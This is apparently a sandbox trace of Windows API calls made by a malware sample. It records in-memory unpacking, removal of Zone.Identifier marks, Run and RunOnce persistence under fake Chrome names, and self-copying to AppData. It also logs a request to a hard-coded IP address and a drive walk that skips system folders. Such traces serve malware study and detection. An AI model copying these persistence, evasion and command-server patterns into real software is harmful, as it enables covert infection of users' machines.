	[0147.230] QueryPerformanceCounter (in: lpPerformanceCount=0x18fccc | out: lpPerformanceCount=0x18fccc*=2574503693456) returned 1
	[0150.342] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcb8 | out: lpPerformanceCount=0x18fcb8*=2574814851454) returned 1
	[0150.342] GetLastError () returned 0x0
	[0150.342] GetLastError () returned 0x0
	[0150.342] GetLastError () returned 0x0
	[0150.342] VirtualQuery (in: lpAddress=0x0, lpBuffer=0x0, dwLength=0x0 | out: lpBuffer=0x0) returned 0x0
	[0150.343] GetModuleHandleA (lpModuleName=0x0) returned 0xe20000
	[0150.343] LockResource (hResData=0x0) returned 0x0
	[0150.343] FindResourceA (hModule=0xe20000, lpName=0x821b, lpType=0xa) returned 0xe30b30
	[0150.343] GetFileTime (in: hFile=0x0, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0
	[0150.343] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x76d90000
	[0150.344] GetProcAddress (hModule=0x76d90000, lpProcName="LoadResource") returned 0x76da76f0
	[0150.344] MoveFileExA (lpExistingFileName=0x0, lpNewFileName=0x0, dwFlags=0x0) returned 0
	[0150.345] LoadResource (hModule=0xe20000, hResInfo=0xe30b30) returned 0xe3bafc
	[0150.345] lstrcpynA (in: lpString1=0x0, lpString2=0x0, iMaxLength=0 | out: lpString1=0x0) returned 0x0
	[0150.345] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d90000
	[0150.345] GetProcAddress (hModule=0x76d90000, lpProcName="LockResource") returned 0x76da7890
	[0150.345] GlobalAddAtomW (lpString=0x0) returned 0x0
	[0150.346] LockResource (hResData=0xe3bafc) returned 0xe3bafc
	[0150.346] DefineDosDeviceA (dwFlags=0x0, lpDeviceName=0x0, lpTargetPath=0x0) returned 0
	[0150.346] SizeofResource (hModule=0xe20000, hResInfo=0xe30b30) returned 0x8400
	[0150.346] VirtualAlloc (lpAddress=0x0, dwSize=0x8400, flAllocationType=0x3000, flProtect=0x40) returned 0xf70000
	[0150.347] lstrcmpiW (lpString1=0x0, lpString2=0x0) returned 0
	[0150.356] LocalSize (hMem=0x0) returned 0x0
	[0150.365] lstrcpyA (in: lpString1=0x18fce4, lpString2="HEWRTWEWETHGSER" | out: lpString1="HEWRTWEWETHGSER") returned="HEWRTWEWETHGSER"
	[0150.365] VirtualAlloc (lpAddress=0x0, dwSize=0xb000, flAllocationType=0x3000, flProtect=0x40) returned 0xf80000
	[0150.366] RtlMoveMemory (in: Destination=0xf80000, Source=0xf70000, Length=0x40 | out: Destination=0xf80000) 
	[0150.366] RtlMoveMemory (in: Destination=0xf800c8, Source=0xf700c8, Length=0xf8 | out: Destination=0xf800c8) 
	[0150.366] RtlMoveMemory (in: Destination=0xf801c0, Source=0xf701c0, Length=0xa0 | out: Destination=0xf801c0) 
	[0150.366] RtlMoveMemory (in: Destination=0xf80040, Source=0xf70040, Length=0x88 | out: Destination=0xf80040) 
	[0150.366] RtlMoveMemory (in: Destination=0xf81000, Source=0xf70400, Length=0x3000 | out: Destination=0xf81000) 
	[0150.367] RtlMoveMemory (in: Destination=0xf84000, Source=0xf73400, Length=0x4a00 | out: Destination=0xf84000) 
	[0150.368] RtlMoveMemory (in: Destination=0xf89000, Source=0xf77e00, Length=0x200 | out: Destination=0xf89000) 
	[0150.368] RtlMoveMemory (in: Destination=0xf8a000, Source=0xf78000, Length=0x400 | out: Destination=0xf8a000) 
	[0150.370] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0150.370] GetKeyboardLayout (idThread=0x0) returned 0x4090409
	[0150.370] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0150.370] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0150.371] Sleep (dwMilliseconds=0x7d0) 
	[0152.403] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18f4bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f4bc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0152.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.406] GetUserNameA (in: lpBuffer=0x18f3a0, pcbBuffer=0x18f4b8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18f4b8) returned 1
	[0152.421] wsprintfW (in: param_1=0x18f4d4, param_2="ChromeReaderHardWress2_%x%x" | out: param_1="ChromeReaderHardWress2_c287f3826d6e218") returned 38
	[0152.423] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="ChromeReaderHardWress2_c287f3826d6e218") returned 0x108
	[0152.423] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0x0) returned 0x0
	[0152.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.424] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare", ulOptions=0x0, samDesired=0x20219, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x110) returned 0x0
	[0152.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.424] RegQueryValueExW (in: hKey=0x110, lpValueName="ChromeFirstVersionHardWare32", lpReserved=0x0, lpType=0x18f4b8, lpData=0x18f0a0, lpcbData=0x18f4b4*=0x208 | out: lpType=0x18f4b8*=0x0, lpData=0x18f0a0*=0xf6, lpcbData=0x18f4b4*=0x208) returned 0x2
	[0152.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.424] RegCloseKey (hKey=0x110) returned 0x0
	[0152.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.425] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare", ulOptions=0x0, samDesired=0x20219, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x110) returned 0x0
	[0152.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.425] RegQueryValueExW (in: hKey=0x110, lpValueName="ChromeFirstVersionHardWare32", lpReserved=0x0, lpType=0x0, lpData=0x18f2b0, lpcbData=0x18f4b8*=0x208 | out: lpType=0x0, lpData=0x18f2b0*=0x0, lpcbData=0x18f4b8*=0x208) returned 0x2
	[0152.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.425] RegCloseKey (hKey=0x110) returned 0x0
	[0152.425] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0152.426] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0152.426] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18ee8c, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe")) returned 0x62
	[0152.426] wsprintfW (in: param_1=0x18f094, param_2="%s:Zone.Identifier" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe:Zone.Identifier") returned 114
	[0152.426] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe:zone.identifier")) returned 0
	[0152.428] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe:zone.identifier")) returned 0
	[0152.428] lstrcpyW (in: lpString1=0x18f29c, lpString2="\"" | out: lpString1="\"") returned="\""
	[0152.428] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe"
	[0152.428] lstrcatW (in: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", lpString2="\"" | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\"") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\""
	[0152.428] lstrlenW (lpString="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\"") returned 100
	[0152.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.429] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf023f, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x110) returned 0x0
	[0152.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.429] RegSetValueExW (in: hKey=0x110, lpValueName="Chrome Reader UpdateHardWare", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\"", cbData=0xca | out: lpData="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\"") returned 0x0
	[0152.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.430] RegFlushKey (hKey=0x110) returned 0x0
	[0152.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.485] RegCloseKey (hKey=0x110) returned 0x0
	[0152.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.504] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare\\Microsoft\\Windows\\CurrentVersion\\RunOnce", ulOptions=0x0, samDesired=0xf023f, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x110) returned 0x0
	[0152.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.505] RegSetValueExW (in: hKey=0x110, lpValueName="*Chrome Reader Update32", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\"", cbData=0xca | out: lpData="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe\"") returned 0x0
	[0152.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.506] RegFlushKey (hKey=0x110) returned 0x0
	[0152.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.513] RegCloseKey (hKey=0x110) returned 0x0
	[0152.513] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f2ac, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe")) returned 0x62
	[0152.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.513] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare", ulOptions=0x0, samDesired=0xf023f, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x110) returned 0x0
	[0152.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.514] RegSetValueExW (in: hKey=0x110, lpValueName="ChromeFirstVersionHardWare32", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", cbData=0x208 | out: lpData="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe") returned 0x0
	[0152.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.515] RegFlushKey (hKey=0x110) returned 0x0
	[0152.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.524] RegCloseKey (hKey=0x110) returned 0x0
	[0152.525] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0152.525] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0152.525] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18ea78, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe")) returned 0x62
	[0152.525] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18ea60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18ea60*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0152.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0152.526] GetUserNameA (in: lpBuffer=0x18e944, pcbBuffer=0x18ea5c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18ea5c) returned 1
	[0152.527] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0153.806] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x18ec80, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 1
	[0153.818] wsprintfW (in: param_1=0x18ee88, param_2="%s\\ChromeFlashPlayer_%x%x.exe" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe") returned 75
	[0153.818] wsprintfW (in: param_1=0x18f090, param_2="%s\\ChromeFlashPlayer_%x%x.exe:Zone.Identifier" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe:Zone.Identifier") returned 91
	[0153.819] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\chromeflashplayer_c287f3826d6e218.exe"), bFailIfExists=0) returned 1
	[0154.094] Sleep (dwMilliseconds=0x258) 
	[0154.722] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\chromeflashplayer_c287f3826d6e218.exe:zone.identifier")) returned 0
	[0154.723] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\chromeflashplayer_c287f3826d6e218.exe:zone.identifier")) returned 0
	[0154.723] lstrcpyW (in: lpString1=0x18f298, lpString2="\"" | out: lpString1="\"") returned="\""
	[0154.723] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe" | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe") returned="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe"
	[0154.724] lstrcatW (in: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe", lpString2="\"" | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe\"") returned="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe\""
	[0154.724] lstrlenW (lpString="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe\"") returned 77
	[0154.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0154.724] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf023f, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x1d0) returned 0x0
	[0154.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0154.725] RegSetValueExW (in: hKey=0x1d0, lpValueName="ChromeFlashPlayersHardWare", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe\"", cbData=0x9c | out: lpData="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe\"") returned 0x0
	[0154.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0154.725] RegFlushKey (hKey=0x1d0) returned 0x0
	[0154.737] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0154.737] RegCloseKey (hKey=0x1d0) returned 0x0
	[0154.737] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0154.737] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare\\Microsoft\\Windows\\CurrentVersion\\RunOnce", ulOptions=0x0, samDesired=0xf023f, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x1d0) returned 0x0
	[0154.738] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0154.738] RegSetValueExW (in: hKey=0x1d0, lpValueName="*ChromeFlashPlayers32", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe\"", cbData=0x9c | out: lpData="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ChromeFlashPlayer_c287f3826d6e218.exe\"") returned 0x0
	[0154.739] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0154.739] RegFlushKey (hKey=0x1d0) returned 0x0
	[0154.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0154.745] RegCloseKey (hKey=0x1d0) returned 0x0
	[0154.745] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x71140000
	[0154.760] InternetOpenA (lpszAgent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x4000000) returned 0xcc0004
	[0154.945] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x71140000
	[0154.945] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://5.39.86.86/default.jpg", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x80000000, dwContext=0x0) returned 0xcc000c
	[0155.374] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0155.375] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x71140000
	[0155.375] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18f498, dwNumberOfBytesToRead=0x20, lpdwNumberOfBytesRead=0x18f4b8 | out: lpBuffer=0x18f498*, lpdwNumberOfBytesRead=0x18f4b8*=0x20) returned 1
	[0155.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0155.376] StrStrA (lpFirst="<!DOCTYPE HTML PUBLIC \"-//IETF// ", lpSrch="default") returned 0x0
	[0155.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.377] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare", ulOptions=0x0, samDesired=0x20219, phkResult=0x18f4bc | out: phkResult=0x18f4bc*=0x368) returned 0x0
	[0155.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.377] RegQueryValueExW (in: hKey=0x368, lpValueName="ChromeLicensionHWare", lpReserved=0x0, lpType=0x18f4b4, lpData=0x18f2ac, lpcbData=0x18f4b8*=0x208 | out: lpType=0x18f4b4*=0x0, lpData=0x18f2ac*=0x20, lpcbData=0x18f4b8*=0x208) returned 0x2
	[0155.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.378] RegCloseKey (hKey=0x368) returned 0x0
	[0155.378] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.378] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="SoftWare", phkResult=0x18f4b4 | out: phkResult=0x18f4b4*=0x368) returned 0x0
	[0155.378] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.379] RegSetValueExW (in: hKey=0x368, lpValueName="ChromeLicensionHWare", Reserved=0x0, dwType=0x3, lpData=0xf89000*, cbData=0x10c | out: lpData=0xf89000*) returned 0x0
	[0155.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.380] RegFlushKey (hKey=0x368) returned 0x0
	[0155.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.388] RegCloseKey (hKey=0x368) returned 0x0
	[0155.388] LocalAlloc (uFlags=0x0, uBytes=0x10c) returned 0xfc0b90
	[0155.388] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0155.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.388] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SoftWare", ulOptions=0x0, samDesired=0x20219, phkResult=0x18f4b0 | out: phkResult=0x18f4b0*=0x368) returned 0x0
	[0155.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.389] RegQueryValueExW (in: hKey=0x368, lpValueName="ChromeLicensionHWare", lpReserved=0x0, lpType=0x18f4a8, lpData=0xfc0b90, lpcbData=0x18f4ac*=0x10c | out: lpType=0x18f4a8*=0x3, lpData=0xfc0b90*, lpcbData=0x18f4ac*=0x10c) returned 0x0
	[0155.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.389] RegCloseKey (hKey=0x368) returned 0x0
	[0155.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.390] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="SoftWare", phkResult=0x18f4b4 | out: phkResult=0x18f4b4*=0x368) returned 0x0
	[0155.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.390] RegSetValueExW (in: hKey=0x368, lpValueName="ChromeLicensionHWare", Reserved=0x0, dwType=0x3, lpData=0xfc0b90*, cbData=0x10c | out: lpData=0xfc0b90*) returned 0x0
	[0155.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.391] RegFlushKey (hKey=0x368) returned 0x0
	[0155.391] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0155.391] RegCloseKey (hKey=0x368) returned 0x0
	[0155.391] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0155.392] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0155.393] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="A:") returned 2
	[0155.393] GetDriveTypeW (lpRootPathName="A:") returned 0x1
	[0155.393] Sleep (dwMilliseconds=0x3e8) 
	[0156.462] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="B:") returned 2
	[0156.462] GetDriveTypeW (lpRootPathName="B:") returned 0x1
	[0156.463] Sleep (dwMilliseconds=0x3e8) 
	[0157.479] wsprintfW (in: param_1=0x18fd04, param_2="%c:" | out: param_1="C:") returned 2
	[0157.479] GetDriveTypeW (lpRootPathName="C:") returned 0x3
	[0157.479] lstrcpyW (in: lpString1=0x18ebd4, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.479] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.479] lstrcpyW (in: lpString1=0x18e7c4, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.479] lstrcatW (in: lpString1="C:\\", lpString2="*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*"
	[0157.480] FindFirstFileW (in: lpFileName="C:\\*.*" (normalized: "c:\\*.*"), lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18fd04, dwReserved1=0x770b6e36, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xfb97b0
	[0157.480] lstrlenW (lpString="C:\\*.*") returned 6
	[0157.480] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.481] CharLowerBuffW (in: lpsz="C:\\*.*", cchLength=0x6 | out: lpsz="c:\\*.*") returned 0x6
	[0157.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.481] StrStrW (lpFirst="c:\\*.*", lpSrch="windows") returned 0x0
	[0157.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.481] StrStrW (lpFirst="c:\\*.*", lpSrch="boot") returned 0x0
	[0157.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.482] StrStrW (lpFirst="c:\\*.*", lpSrch="system volume information") returned 0x0
	[0157.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.482] StrStrW (lpFirst="c:\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0157.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.482] StrStrW (lpFirst="c:\\*.*", lpSrch="temp") returned 0x0
	[0157.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.482] StrStrW (lpFirst="c:\\*.*", lpSrch="program files") returned 0x0
	[0157.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.483] StrStrW (lpFirst="c:\\*.*", lpSrch="program files (x86)") returned 0x0
	[0157.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.483] StrStrW (lpFirst="c:\\*.*", lpSrch="appdata") returned 0x0
	[0157.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.483] StrStrW (lpFirst="c:\\*.*", lpSrch="application data") returned 0x0
	[0157.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.483] StrStrW (lpFirst="c:\\*.*", lpSrch="winnt") returned 0x0
	[0157.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.484] StrStrW (lpFirst="c:\\*.*", lpSrch="tmp") returned 0x0
	[0157.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.484] StrStrW (lpFirst="c:\\*.*", lpSrch="cache") returned 0x0
	[0157.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.484] StrStrW (lpFirst="c:\\*.*", lpSrch="temporary internet files") returned 0x0
